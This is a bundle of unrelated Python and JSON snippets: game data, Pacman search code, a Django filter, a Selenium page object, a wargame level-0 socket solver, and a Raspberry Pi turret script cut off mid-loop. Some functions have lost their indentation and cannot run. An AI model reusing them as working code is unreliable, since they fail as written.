{"id": 18, "name":"card18", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "1", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 19, "name":"card19", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "2", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 20, "name":"card20", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "3", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 21, "name":"card21", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "4", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 22, "name":"card22", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "5", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 23, "name":"card23", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "6", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 24, "name":"card24", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "7", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 25, "name":"card25", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "0", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 26, "name":"card26", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "1", "hp": 1, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 27, "name":"card27", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "2", "hp": 2, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 28, "name":"card28", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "3", "hp": 3, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 29, "name":"card29", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "4", "hp": 4, "durability": 0, "skillId": 0, "flavorText":""},
{"id": 30, "name":"card30", "cardClass":"warrior", "element":"air", "race": "", "rarity":1, "cost": 1, "type":"minion", "atk": "5", "hp": 5, "durability": 0, "skillId": 0, "flavorText":""},
],
}
ROOM_INIT_DATA={
    "room_info":{
        "roomId":0,
        # Player seat slots.
        "pos1": None,
        "pos2": None,
        # Who draws first, 1 or 2.  (Bug fix: the original literal declared
        # "first" twice; the duplicate — with the same value 0 — was removed.)
        "first": 0,
        # Battle result.
        "result": 0,
        # Turn counter.
        "round": 0,
        # Who ended their turn last, 1 or 2.
        "turn": 0,
        # Whether both sides have ended the turn.
        "turnStatus": 0,
        # Time of the last attack.
        "actTime1": 0,
        "actTime2": 0,
        # Time of the initial-hand mulligan.
        "firstChangeCardTime1": 0,
        "firstChangeCardTime2": 0,
        # Time of the initial draw.
        "firstGetCardTime1": 0,
        "firstGetCardTime2": 0,
        # Time when both sides completed the initial draw.
        "firstGetCardEndTime": 0,
        # Time the initial hand was confirmed.
        "confirmFirstHCTime1": 0,
        "confirmFirstHCTime2": 0,
        # Current mana-crystal counts.
        "crystal1":0 ,
        "crystal2":0 ,
        # Number of turns taken after the deck ran out of cards.
        "noCardTurn1":0 ,
        "noCardTurn2":0 ,
        # Whether the hero power was used this turn.
        "stime1":0 ,
        "stime2":0 ,
        # Whether a weapon was equipped and used this turn; equipping allows
        # an attack, but a hero that has already attacked cannot attack again.
        "wtime1":0 ,
        "wtime2":0 ,
        # Both heroes.
        "heros": [],
        # Hands.
        "cardHand1": [],
        "cardHand2": [],
        # Original decks as dicts (10 cards each).
        "cardOrigin1": {},
        "cardOrigin2": {},
        # Draw piles.
        "cardAll1": [],
        "cardAll2": [],
        # Cards on the board.
        "cardPlay1": [],
        "cardPlay2": [],
        # Weapon (keyed by uniqid).
        "weapon1": {},
        # Weapon (keyed by uniqid).
        "weapon2": {},
        # Skill/effect stack.
        'effect1':{},
        # Skill/effect stack.
        'effect2':{},
    }
    ,
}
#status
# Bit-flag statuses: default, charge (dash), taunt, windfury, divine shield,
# stealth, silence, frozen, transformed (polymorphed), secret, stun.
STATUS_DEFAULT, STATUS_DASH, STATUS_TAUNT, STATUS_WINDFURY, STATUS_SHIELD, STATUS_STEALTH, STATUS_SILENCE, STATUS_FROZEN, \
STATUS_TRANSFORMED, STATUS_SECRET, STATUS_STUN \
= 0, 1, 2, 4, 8 ,16, 32, 64, 128, 256, 512
# Card types.
HERO_SKILL, HERO_CREATURE, HERO_EQUIPMENT, HERO_CREATURE_TOKEN, HERO_HEROSKILL, HERO_WEAPON, HERO_HERO= 'skill', \
'creature', 'equipment', 'creatureToken', 'heroSkill', 'weapon', 'hero'
# Effect types.
EFFECT_TYPE_CHARGE, EFFECT_TYPE_TAUNT, EFFECT_TYPE_SUMMON, EFFECT_TYPE_DAMAGE, EFFECT_TYPE_HEAL, EFFECT_TYPE_ADDHP, EFFECT_TYPE_ADDMAXHP, EFFECT_TYPE_WINDFURY, \
EFFECT_TYPE_ARMOR, EFFECT_TYPE_STUN, EFFECT_TYPE_ADDATTK, EFFECT_TYPE_ADDCRYSTAL= 'charge', 'taunt', 'summon', 'damage', 'heal', 'addhp', 'addmaxhp', 'windfury', \
'armor', 'stun', 'attack+', 'chakra+'
# English summary of the (Chinese) block below: for frozen/taunt/windfury
# cards the redis score is the maximum number of turns the effect lasts.
# Special scores: once = -1, cardExistence = -2, thisTurnEnd = 1,
# thisMatchEnd = -3, xTurnsFromNow = x, xTurnsFromNext = x-1.  A score of N
# means "lasts N turns starting from the current turn"; each elapsed turn
# decrements the score, and when it reaches 0 the status is removed.
# %s in the key templates is the roomId.
'''
冰冻,嘲讽,风怒的牌,分数是最多可以持续的回合
once= -1
cardExistence=-2
thisTurnEnd= 1
thisMatchEnd= -3
xTurnsFromNow= x
xTurnsFromNext= x-1
1代表从当前回合开始,持续1回合
2代表从当前回合开始,持续2回合
3代表从当前回合开始,持续3回合
...
每消耗一回合,score-1, score减至0时取消冰冻,嘲讽,风怒等状态, %s为roomId
'''
REDIS_KEY_EFFECT_WINDFURY_TURN= 'hs:effect:windfury:%s'
REDIS_KEY_EFFECT_TAUNT_TURN= 'hs:effect:taunt:%s'
REDIS_KEY_EFFECT_STUN_TURN= 'hs:effect:stun:%s'
REDIS_KEY_EFFECT_ADDATK_TURN= 'hs:effect:addAtk:%s'
# Short field names used in serialized battle state.
V_ATTACK, V_INDEX, V_ARMOR, V_UNIQID, V_HP, V_STATUS, V_TYPE, V_HERO_SKILL_TIME, V_ATTACK_TIME, V_DESKTOP_OPP, V_DESKTOP_SELF, V_CRYSTAL, V_WEAPON= \
'atk', 'i', 'a', 'uqd', 'hp', 's', 't', 'sT', 'aT', 'dOpp', 'dSelf', 'c', 'w'
V_SKILL_CARD_ID= 'sid'
|
from router_solver import *
class Instruction(object):
    """A single character instruction: a movement (or attribute change)
    optionally repeated *times* times."""
    def __init__(self, character_name, movement, times=None):
        self.character_name = character_name
        self.movement = movement
        # Bug fix: previously self.times was only assigned when *times* was
        # an int, so later attribute access (e.g. in __eq__ or printing)
        # could raise AttributeError.  Non-int values now store None.
        self.times = times if type(times) is int else None
    # Two instructions are equal when all three fields match.
    def __eq__(self, other):
        if type(self) is not Instruction or type(other) is not Instruction:
            # Bug fix: return NotImplemented (not an implicit None) so Python
            # can try the reflected comparison and fall back to identity.
            return NotImplemented
        self_data = [
            self.character_name,
            self.movement,
            self.times,
        ]
        other_data = [
            other.character_name,
            other.movement,
            other.times,
        ]
        return self_data == other_data
    def __hash__(self):
        # NOTE(review): identity hash is inconsistent with __eq__ (equal
        # instructions may hash differently); kept for backward compatibility.
        return id(self)
def print_instructions(instructions):
    """Pretty-print a sequence of Instruction objects to stdout."""
    hat_names = {1: '"cowboy"', 2: '"cool"', 3: '"shoes"', 4: '"makeup"'}
    for inst in instructions:
        print("CHARACTER_NAME:", inst.character_name)
        if inst.movement == "hat":
            # A "hat" instruction stores the hat id in .times.
            print("ATRIBUTE:", inst.movement)
            print("NAME:", hat_names.get(inst.times, "None"))
        else:
            print("MOVEMENT:", inst.movement)
            print("TIMES:", inst.times)
        print()
|
# -*- coding: utf-8 -*-
# search.py
# ---------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
In search.py, you will implement generic search algorithms which are called by
Pacman agents (in searchAgents.py).
"""
import util
# import sys
class SearchProblem:
    """This class outlines the structure of a search problem, but doesn't implement
    any of the methods (in object-oriented terminology: an abstract class).
    You do not need to change anything in this class, ever.
    """
    # Every method aborts via util.raiseNotDefined(); concrete problems
    # (see searchAgents.py) override all four.
    def getStartState(self):
        """
        Returns the start state for the search problem.
        """
        util.raiseNotDefined()
    def isGoalState(self, state):
        """
        state: Search state
        Returns True if and only if the state is a valid goal state.
        """
        util.raiseNotDefined()
    def getSuccessors(self, state):
        """
        state: Search state
        For a given state, this should return a list of triples, (successor,
        action, stepCost), where 'successor' is a successor to the current
        state, 'action' is the action required to get there, and 'stepCost' is
        the incremental cost of expanding to that successor.
        """
        util.raiseNotDefined()
    def getCostOfActions(self, actions):
        """
        actions: A list of actions to take
        This method returns the total cost of a particular sequence of actions.
        The sequence must be composed of legal moves.
        """
        util.raiseNotDefined()
def tinyMazeSearch(problem):
    """
    Returns a sequence of moves that solves tinyMaze.  For any other maze, the
    sequence of moves will be incorrect, so only use this for tinyMaze.
    """
    from game import Directions
    south = Directions.SOUTH
    west = Directions.WEST
    # Hard-coded solution path for the tinyMaze layout.
    return [south, south, west, south, west, west, south, west]
def depthFirstSearch(problem):
    """
    Search the deepest nodes in the search tree first.
    Your search algorithm needs to return a list of actions that reaches the
    goal. Make sure to implement a graph search algorithm.
    To get started, you might want to try some of these simple commands to
    understand the search problem that is being passed in:
    print "Start:", problem.getStartState()
    print "Is the start a goal?", problem.isGoalState(problem.getStartState())
    print "Start's successors:", problem.getSuccessors(problem.getStartState())
    """
    "*** YOUR CODE HERE ***"
    # Unimplemented skeleton: dumps the problem's start state and its
    # successors for exploration, then aborts via util.raiseNotDefined().
    print("Start: ", problem.getStartState())
    print("Is the start the goal: ",
          problem.isGoalState(problem.getStartState()))
    print("Start's successors: ",
          problem.getSuccessors(problem.getStartState()))
    util.raiseNotDefined()
def breadthFirstSearch(problem):
    """Search the shallowest nodes in the search tree first."""
    "*** YOUR CODE HERE ***"
    # Unimplemented skeleton; aborts until the student fills it in.
    util.raiseNotDefined()
def uniformCostSearch(problem):
    """Search the node of least total cost first."""
    "*** YOUR CODE HERE ***"
    # Unimplemented skeleton; aborts until the student fills it in.
    util.raiseNotDefined()
def nullHeuristic(state, problem=None):
    """
    A heuristic function estimates the cost from the current state to the
    nearest goal in the provided SearchProblem.  This trivial heuristic
    always estimates zero, which reduces A* to uniform-cost search.
    """
    return 0
def testHeuristic(position, problem=None):
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def aStarSearch(problem, heuristic=nullHeuristic):
    """Search the node that has the lowest combined cost and heuristic first.

    Keeps a parenting "tree" mapping str(state) -> [parent state, best known
    f-cost, action from parent], and a priority queue of frontier states
    ordered by that cost.  The returned value is the list of actions from the
    start state to the goal, reconstructed by walking parents backwards.
    """
    from util import PriorityQueue
    # print("\nStart position: " + str(problem.getStartState()))
    # print("\nGoal: " + str(problem.goal))
    # print("Heuristic for the start state: " + str(heuristic(problem.getStartState(), problem)))
    currentState = problem.getStartState()
    nodesToVisit = PriorityQueue()
    tree = {}
    tree[str(currentState)] = [None, heuristic(currentState, problem), None] # {"node": [parent node, cost to get to the son using this path, action to get from the parent to the son] }
    # iter = 1
    while(not(problem.isGoalState(currentState))):
        # print('\nIteration #' + str(iter))
        # print('Current position: ' + str(currentState))
        successors = problem.getSuccessors(currentState)
        # Visiting the current node
        # print('Possible actions for the current node:')
        for suc in successors:
            # NOTE(review): the g-cost is rebuilt as the successor's step cost
            # plus +1 per ancestor edge back to the start, i.e. it assumes
            # every earlier step costs exactly 1 — confirm unit step costs
            # before reusing this on weighted problems.
            cost = heuristic(suc[0], problem) + suc[2]
            tracebackState = currentState
            while(tracebackState != problem.getStartState()):
                cost += 1
                tracebackState = tree[str(tracebackState)][0]
            # Checking the parenting tree to avoid loops and updating it when needed
            # Update is needed if the son does not exist or the cost of the found path is smaller than the one stored in tree
            if((str(suc[0]) not in tree.keys()) or (cost < tree[str(suc[0])][1])):
                # print('Moving to ' + str(suc[0]) + ' Cost: ' + str(cost))
                nodesToVisit.update(suc[0], cost)
                tree[str(suc[0])] = [currentState, cost, suc[1]]
                # print('Tree updated: ' + '\'' + str(suc[0]) + '\' : ' + str([currentState, cost, suc[1]]))
            # else:
            #     print('Tree did not update: ' + '\'' + str(suc[0]) + '\' : ' + str([currentState, cost, suc[1]]) +
            #           ' because previous cost was ' + str(tree[str(suc[0])][1]))
        # print('Parenting tree: ')
        # print(tree)
        # Updating to the next node
        currentState = nodesToVisit.pop()
        # iter += 1
    # print('\nFinal tree: ' + str(tree) + '\n')
    # Building the path based on the parenting tree
    solution = []
    while(currentState != problem.getStartState()):
        solution.insert(0, tree[str(currentState)][2])
        currentState = tree[str(currentState)][0]
    # print('Solution: ' + str(solution))
    return solution
def aStarSearchTimer(problem, heuristic=nullHeuristic):
    """Benchmark aStarSearch over 50 repetitions, print the total elapsed
    time, and return the (last) solution found."""
    from timeit import default_timer
    started = default_timer()
    for _ in range(50):
        solution = aStarSearch(problem, heuristic)
    elapsed = default_timer() - started
    print('Execution time: ' + str(elapsed) + 's')
    return solution
# Abbreviations
# Short aliases matching the names the Pacman command line expects (-f bfs, ...).
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
timer = aStarSearchTimer
|
def should_check_command(data):
    """True when *data* is a chat message from a supported platform."""
    is_chat = data.IsChatMessage()
    return is_chat and is_from_streaming_platform(data)
def is_from_streaming_platform(data):
    """True when the message originated on Twitch or YouTube."""
    from_twitch = data.IsFromTwitch()
    return from_twitch or data.IsFromYoutube()
|
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def isSubPath(self, head, root):
        """
        Return True if the linked list starting at *head* appears as a
        downward path somewhere in the binary tree rooted at *root*.
        :type head: ListNode
        :type root: TreeNode
        :rtype: bool
        """
        if head is None:
            return True   # empty list matches trivially
        if root is None:
            return False  # list left to match but tree exhausted
        # Calling the helpers inline (instead of binding their results to
        # locals first) measured roughly 2x faster on LeetCode (112-116ms
        # vs 228ms), so the chained form is kept deliberately.
        return self.find_path(head, root) or self.isSubPath(head, root.left) or self.isSubPath(head, root.right)
    def find_path(self, head, root):
        """
        Return True if the list starting at *head* matches a downward path
        starting exactly at *root*.
        """
        if head is None:
            return True
        if root is None:
            return False
        if head.val == root.val:
            return self.find_path(head.next, root.left) or self.find_path(head.next, root.right)
        # Bug fix: previously fell off the end and returned None (falsy but
        # surprising) on a value mismatch; return an explicit bool instead.
        return False
|
from .depth_model import DepthNet
from .depth_net_res_net import DepthNetResNet
from .pose_model import PoseNet, PoseNetResNet
from .scaled_unsupervised_depth_model import ScaledUnsupervisedDepthModel
from .depth_evaluation_model import DepthEvaluationModel
from .multi_unsupervised_depth_model import MultiUnsupervisedDepthModel
|
import django_filters
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.utils.timezone import now
from elections.models import Election
from organisations.models import OrganisationGeography
class ElectionFilter(django_filters.FilterSet):
    """Filters for the Election API.

    Declarative filters are class attributes; the custom
    `election_intersects_local_authority` filter resolves a local-authority
    identifier to a single OrganisationGeography and returns elections whose
    geography overlaps it.
    """

    def election_intersects_local_authority_filter(self, queryset, name, value):
        """Filter `queryset` to elections intersecting the local authority
        identified by `value` (an official identifier).

        Raises ValidationError when the identifier is not a local authority,
        or when more than one geography matches and no date parameter
        disambiguates.
        """
        og_qs = OrganisationGeography.objects.filter(
            organisation__official_identifier=value,
            organisation__organisation_type="local-authority",
        ).select_related("organisation")
        if not og_qs.exists():
            raise ValidationError(
                """Only local authorities supported""",
                code="invalid",
            )
        # Narrow down multiple geographies using whichever date hints the
        # request supplied.
        if self.data.get("future", False):
            og_qs = og_qs.filter(
                Q(end_date__gt=now()) | Q(end_date=None)
            ).filter(Q(start_date__lt=now()) | Q(start_date=None))
        if "poll_open_date" in self.data and self.data["poll_open_date"]:
            og_qs = og_qs.filter(
                Q(start_date__lte=self.data["poll_open_date"])
                | Q(start_date=None)
            )
        if (
            "organisation_start_date" in self.data
            and self.data["organisation_start_date"]
        ):
            og_qs = og_qs.filter(
                Q(start_date__lte=self.data["organisation_start_date"])
                | Q(start_date=None)
            )
        try:
            # Exactly one geography must remain at this point.
            geography = og_qs.get().geography
        except OrganisationGeography.MultipleObjectsReturned:
            raise ValidationError(
                """Organisation has more than one geography,
                please specify a `poll_open_date` or organisation_start_date""",
                code="invalid",
            )
        except OrganisationGeography.DoesNotExist:
            # NOTE(review): this returns the (empty) OrganisationGeography
            # queryset rather than an empty Election queryset — preserved
            # as-is, but confirm callers expect that.
            return og_qs
        # Fixed: the original called og_qs.get() twice more below, issuing
        # redundant database queries; the geography is fetched once above.
        return queryset.filter(
            Q(division_geography__geography__bboverlaps=geography)
            | Q(organisation_geography__geography__bboverlaps=geography)
        ).prefetch_related("_children_qs")

    organisation_identifier = django_filters.CharFilter(
        field_name="organisation__official_identifier",
        lookup_expr="exact",
    )
    organisation_type = django_filters.CharFilter(
        field_name="organisation__organisation_type",
        lookup_expr="exact",
    )
    election_intersects_local_authority = django_filters.CharFilter(
        label="Election intersects local authority",
        method="election_intersects_local_authority_filter",
    )
    organisation_start_date = django_filters.DateFilter(
        field_name="organisation__start_date",
        lookup_expr="exact",
    )
    election_id_regex = django_filters.CharFilter(
        label="Filter elections by their election id using a regular expression",
        field_name="election_id",
        lookup_expr="regex",
        max_length="20",
    )
    exclude_election_id_regex = django_filters.CharFilter(
        label="Exclude elections by their election id using a regular expression",
        field_name="election_id",
        lookup_expr="regex",
        exclude=True,
        max_length="20",
    )
    modified = django_filters.IsoDateTimeFilter(
        field_name="modified",
        lookup_expr="gt",
        help_text="An ISO datetime",
    )

    class Meta:
        model = Election
        fields = {
            "group_type": ["exact"],
            "poll_open_date": ["exact", "gte", "lte"],
        }
|
import re

s = "adfkasdjklfjdslf???"
# Insert a space before each sentence-ending mark, then collapse every run
# of characters outside [a-zA-Z.!?] into a single space.
_pad_punct = re.compile(r"([.!?])")
_squash = re.compile(r"[^a-zA-Z.!?]+")
s = _pad_punct.sub(r" \1", s)
s = _squash.sub(" ", s)
print(s)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 8/2/2017 5:03 PM
# @Author : Winnichen
# @File : LoginPage.py
from pages.BasePage import BasePage
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import logging
import os,time
class LoginPage(BasePage):
    """Page object for the login flow: locators plus thin click/type wrappers."""

    # Locators as (strategy, selector) tuples.
    username1_loc = (By.ID, "cred_userid_inputtext")
    login_loc = (By.ID, "cred_sign_in_button")
    password_loc = (By.ID, "passwordInput")
    submit_loc = (By.ID, "submitButton")
    checkpoint_loc = (By.CSS_SELECTOR, "#header-bar > div.heard-btn > div > a")
    logout_loc = (By.CSS_SELECTOR, "#header-bar > div.heard-btn > div > ul > li > a")
    checkpoint_logout_loc = (By.ID, "login_workload_logo_text")

    def _pause_and_click(self, locator):
        # Every click in the original waited one second first to let the
        # page settle; behaviour preserved here.
        time.sleep(1)
        self.find_element(*locator).click()

    def input_username(self, username):
        self.send_keys(self.username1_loc, username)

    def click_login(self):
        self._pause_and_click(self.login_loc)

    def input_password(self, password):
        self.send_keys(self.password_loc, password)

    def click_submit(self):
        self._pause_and_click(self.submit_loc)

    def get_username(self):
        return self.find_element(*self.checkpoint_loc).text

    def click_username(self):
        self._pause_and_click(self.checkpoint_loc)

    def click_logout(self):
        self._pause_and_click(self.logout_loc)
|
#!/usr/bin/python3
import socket
import struct

# OverTheWire "vortex" level 0: the server sends four little-endian unsigned
# 32-bit integers; reply with their sum (mod 2**32) to receive the response.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    host = socket.gethostbyname('vortex.labs.overthewire.org')
    port = 5842
    s.connect((host, port))
    # Read the four 4-byte challenge values.
    # NOTE(review): recv(4) may legally return fewer than 4 bytes; this
    # assumes each integer arrives in one segment — confirm if flaky.
    values = [struct.unpack('<L', s.recv(4))[0] for _ in range(4)]
    # Mask to 32 bits: the plain sum can exceed '<L' range, which made the
    # original's struct.pack raise and fall into the except branch.
    s.send(struct.pack('<L', sum(values) & 0xFFFFFFFF))
    print(str(s.recv(1024).decode()))
except (OSError, struct.error, UnicodeDecodeError):
    # Narrowed from a bare `except:` so Ctrl-C and programming errors
    # still surface instead of being swallowed.
    print("kaboom")
finally:
    # Always release the socket (the original leaked it).
    s.close()
|
import numpy as np
import matplotlib.pyplot as plt
import layer
import activation
import loss
import metric
import data
# (Usage notes for nn_basics/basic_neuron.py and logical_operations.py that
# previously lived here as commented-out example code have been removed.)

# INPUT: spiral toy dataset with integer labels plus a one-hot encoding.
X, y = data.data_spiral()
y_onehot = data.one_hot(y)

# Model architecture: 2 -> 4 -> 3 dense net, LeakyReLU hidden layer,
# softmax output, categorical cross-entropy loss.
layer1 = layer.Layer_Dense(2, 4)
activation1 = activation.Activation_LeakyReLU()
layer2 = layer.Layer_Dense(4, 3)
activation2 = activation.Activation_Softmax()
loss1 = loss.Loss_CategoricalCrossEntropy()
metric1 = metric.Metric_Accuracy()


def _evaluate():
    """Run one forward pass over the full dataset and print loss/accuracy."""
    layer1.forward(X)                            # FC layer
    activation1.forward(layer1.output)           # non-linear fun
    layer2.forward(activation1.output)           # FC layer
    activation2.forward(layer2.output)           # non-linear fun
    loss1.forward(activation2.output, y_onehot)  # loss fun
    print(f"Loss: {np.mean(loss1.output)}")      # loss
    print(f"Accuracy: {metric1.calculate(activation2.output, y)}")  # metrics


# Evaluate, take one backprop/update step, then evaluate again to see the
# loss move. (The duplicated evaluation code is factored into _evaluate();
# an unused `weights1 = layer1.weights` capture was removed.)
_evaluate()
loss1.backward()
activation2.backward(loss1.grad)
layer2.backward(activation2.grad)
layer2.update()
activation1.backward(layer2.grad)
layer1.backward(activation1.grad)
layer1.update()
_evaluate()
|
#!/usr/bin/python
import RPi.GPIO as GPIO
import time
from pygame import mixer
import random
import sys
import select
import math
# Constants
SOUND_FOLDER= "./sounds/"  # base directory for all audio clips
LANGUAGE = "en"            # sub-folder holding the localized voice lines
EXT = ".wav"
# More sounds here http://theportalwiki.com/wiki/Turret_voice_lines#Turret_fire
# Voice-line pools; one file name (without path/extension) per utterance.
SOUNDS_DETECTED = ["i_see_you","here_you_are","who_s_there","target_adquired", "firing", "gotcha"]
SOUNDS_MISS = ["are_you_still_there", "target_lost","searching"]
SOUNDS_SEARCH = ["searching", "hello","is_anyone_there", "sentry_mode_activated", "coud_you_come_here"]
SOUNDS_DIE = ["i_dont_blame_you", "i_dont_hate_you", "auauauau", "self_test_error", "resting", "hybernating", "sleep_mode_activated","shutting_down", "no_hard_feelings", "malfunctioning", "critical_error"]
SOUNDS_MOVE = ["stop_shooting", "put_me_down", "wow", "eyeyey", "who_are_you", "please_put_me_down"]
# Non-localized effect clips live directly in SOUND_FOLDER.
SOUND_FIRE = SOUND_FOLDER+"fire"+EXT
SOUND_PING = SOUND_FOLDER+"ping"+EXT
SOUND_DIE = SOUND_FOLDER+"die"+EXT
SOUND_DEPLOY = SOUND_FOLDER+"deploy"+EXT
SOUND_RETRACT = SOUND_FOLDER+"retract"+EXT
TIME_LOOP = 1       # Time between loops (seconds)
TIME_ACTIVE = 5     # Time to wait after activation
TIME_DETECTION = 30 # If last detection is older than this, the target is lost
# State-machine states for the main loop.
NOT_DETECTED = 0
DETECTED = 1
# GPIO PINS (board numbering, see GPIO.setmode below)
PIN_LED = 12
PIN_PIR = 7
PIN_VIBRATOR = 11
# GPIO setup
GPIO.setmode(GPIO.BOARD)
GPIO.setup(PIN_VIBRATOR, GPIO.OUT)
GPIO.setup(PIN_LED, GPIO.OUT)
GPIO.setup(PIN_PIR, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)
# Mutable module state
deployed = False               # NOTE(review): never set to True anywhere — confirm intended
status = NOT_DETECTED          # current state-machine state
lastDetectionTime = 0          # epoch seconds of the last PIR trigger
#Functions
def chance(prob):
    """Return True with probability `prob` percent (prob in 0..100).

    Fixed: the original used randint(0, 100), which draws from 101 values,
    so chance(100) could still return False about 1 time in 101. With
    randrange(100), chance(0) is always False and chance(100) always True.
    """
    return random.randrange(100) < prob
def isDetected():
    """True while the last PIR trigger was under TIME_DETECTION seconds ago."""
    elapsed = time.time() - lastDetectionTime
    return elapsed < TIME_DETECTION
def motion(PIN_PIR):
    # GPIO edge-detect callback (wired up via GPIO.add_event_detect):
    # records when motion was last seen. `PIN_PIR` is the channel number
    # RPi.GPIO passes to the callback.
    global lastDetectionTime
    print "Motion detected! "
    lastDetectionTime = time.time()
def randomSound(sounds):
    """Pick one name from `sounds` and return its localized file path."""
    name = random.choice(sounds)
    return "".join([SOUND_FOLDER, LANGUAGE, "/", name, EXT])
def speak(sounds):
    """Play a random voice line from `sounds` and block until it finishes."""
    mixer.music.load(randomSound(sounds))
    mixer.music.play()
    waitMixerFinish()
def waitMixerFinish():
    """Poll once a second until the mixer has finished playing."""
    while True:
        if not mixer.music.get_busy():
            break
        time.sleep(1)
def shoot():
    # Fire: deploy if retracted, then run the vibrator for exactly the
    # duration of the fire sound.
    # NOTE(review): nothing ever sets the global `deployed` to True, so
    # deploy() runs on every shot — confirm whether that is intended.
    if (not deployed):
        deploy()
    mixer.music.load(SOUND_FIRE)
    mixer.music.play()
    GPIO.output(PIN_VIBRATOR, True)   # vibration on while the clip plays
    waitMixerFinish()
    GPIO.output(PIN_VIBRATOR, False)
def ping():
    # Play the ping clip five times at one-second intervals; each play()
    # restarts the loaded clip from the beginning.
    mixer.music.load(SOUND_PING)
    for i in range(5):
        mixer.music.play()
        time.sleep(1)
def fadeDown():
    # Ramp the LED brightness from full to off over ~2 s, then force it off.
    GPIO.output(PIN_LED, True)
    pwm(PIN_LED,100,-1, 2)
    GPIO.output(PIN_LED, False)
def fadeUp():
    # Ramp the LED brightness from off to full over ~2 s and leave it on.
    GPIO.output(PIN_LED, True)
    pwm(PIN_LED,0,1, 2)
def pwm(pin, start, increment, totalTime):
    """Ramp the PWM duty cycle on `pin` from `start` in steps of
    `increment` (+1 to brighten, -1 to dim), spreading the full sweep over
    roughly `totalTime` seconds.

    Fixed: the original ignored the `pin` argument and always drove
    PIN_LED; the PWM object is now also stopped when the ramp ends.
    """
    p = GPIO.PWM(pin, 50)  # 50 Hz carrier
    p.start(0)
    count = start + increment
    # Seconds per 1% step so a full 0-100 sweep takes `totalTime`.
    sleep = float(totalTime) / (100 / math.fabs(increment))
    while 0 < count < 100:
        p.ChangeDutyCycle(count)
        time.sleep(sleep)
        count += increment
    p.stop()
def blink():
    """Flash the LED off then on, holding each phase a random 10-200 ms."""
    period = random.uniform(0.01, 0.2)
    for state in (False, True):
        GPIO.output(PIN_LED, state)
        time.sleep(period)
def die():
    # Death sequence: final voice line, one last shot, death-rattle clip
    # with LED flicker, then fade the LED out.
    GPIO.output(PIN_LED, True)
    speak(SOUNDS_DIE)
    shoot()
    mixer.music.load(SOUND_DIE)
    mixer.music.play()
    for i in range(5):
        blink()
    fadeDown()
def pickedUp():
    # Complain when the turret is moved/handled.
    speak(SOUNDS_MOVE)
def deploy():
    # Play the deploy sound; does not wait for completion.
    # NOTE(review): does not set the global `deployed` flag — confirm.
    mixer.music.load(SOUND_DEPLOY)
    mixer.music.play()
def retract():
    # Play the retract sound; does not wait for completion.
    mixer.music.load(SOUND_RETRACT)
    mixer.music.play()
def readInput():
input = ""
i,o,e = select.select([sys.stdin],[],[],0.0001)
for s in i:
if s == sys.stdin:
input = sys.stdin.readline().strip()
if (input == ""):
pass
elif (input == "enable"):
lastDetectionTime = time.time()
elif (input == "disable"):
lastDetectionTime = 0
elif (input == "shoot"):
shoot()
elif (input == "pick"):
pickedUp()
elif (input == "die"):
die()
else:
print "Unrecognised command "+input
# init
mixer.init()
# The PIR rising edge fires motion() asynchronously, updating lastDetectionTime.
GPIO.add_event_detect(PIN_PIR, GPIO.RISING, callback = motion)
print "Start torret loop, press [CTRL + C] to exit"
# Loop: a two-state machine (NOT_DETECTED <-> DETECTED) driven by how
# recently the PIR sensor fired; transitions trigger sounds/LED changes.
try:
    while True:
        readInput()
        if (status == NOT_DETECTED and isDetected() ):
            # Rising transition: target just appeared.
            print "Target adquired"
            status = DETECTED
            GPIO.output(PIN_LED, True)
            speak(SOUNDS_DETECTED)
            shoot() #Play fire sound and vibration
            ping()
        elif (status == DETECTED and isDetected() ):
            # Still detected: nothing to do each loop iteration.
            #print "Still detected"
